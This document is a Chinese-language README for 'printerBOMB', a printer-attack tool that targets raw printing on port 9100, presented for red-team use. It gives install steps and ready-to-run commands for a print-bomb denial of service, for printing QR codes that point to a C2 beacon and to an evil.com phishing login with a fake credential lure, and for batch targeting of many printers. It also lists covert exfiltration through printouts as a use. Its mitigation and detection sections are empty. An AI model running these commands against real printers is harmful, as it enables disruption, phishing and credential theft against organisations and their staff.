____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - 打印机后台打印攻击框架
利用被忽视的攻击向量:您的网络打印机
开发者:Azhari Ramadhan 🔥
PrintHack 是一款专为安全专业人员、红队成员和渗透测试人员设计的高级打印机利用工具。该工具利用原始打印机后台打印协议(端口 9100)执行安全评估、测试打印机漏洞并模拟真实世界的攻击场景。
⚠️ 免责声明:本工具仅用于合法的安全测试和教育目的。请负责任地使用,且仅限用于您拥有或已获得明确授权测试的系统。
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - 图像处理qrcode - 二维码生成requests - HTTP 请求pip install Pillow qrcode requests
# 测试打印机连通性
python3 printerhack.py -t 192.168.1.100 --check
# 发送测试页
python3 printerhack.py -t 192.168.1.100 --test
# 打印自定义消息
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# 从 URL 打印图像(转换为 ASCII)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# 发送 PCL 载荷
python3 printerhack.py -t 192.168.1.100 --pcl
# 打印炸弹(DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# 打印 C2 回调二维码
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# 打印钓鱼二维码
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# 从文件批量打印至多台打印机
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
在物理访问场景中,向被入侵的打印机打印隐蔽消息或指令。
打印指向凭据收集页面的二维码,伪装成安全通知。
利用打印机输出作为编码数据的隐蔽外泄信道。
测试组织对基于打印机的拒绝服务攻击的韧性。
枚举并识别网络中的打印机。
检测指标:
缓解策略:
本工具按"原样"提供,仅用于合法的安全测试。
作者不对任何滥用本工具的行为承担责任。
在测试任何系统之前,务必获得书面授权。
未经授权的使用可能违反《计算机欺诈和滥用法》(CFAA)
以及您所在司法辖区的类似法律。
开发者:Azhari Ramadhan
欢迎贡献!请确保:
开发者:Azhari Ramadhan 🔥
MIT 许可证 - 详情请参阅 LICENSE
🖨️ printerBOMB - 利用最后一道防线
通过像攻击者一样思考来保持领先
由 Azhari Ramadhan 用 🔥 打造
| 功能 | 描述 |
|---|
--check | 测试打印机连通性 |
--test | 发送测试页 |
--message | 打印自定义载荷 |
--image | 从 URL 打印图像(ASCII 艺术) |
--pcl | 发送 PCL 格式载荷 |
--bomb | DoS 攻击(海量载荷) |
--c2 | 打印 C2 回调二维码 |
--phish | 打印钓鱼二维码 |
--exfil | 打印数据外泄标记 |
--file | 批量打印至多个目标 |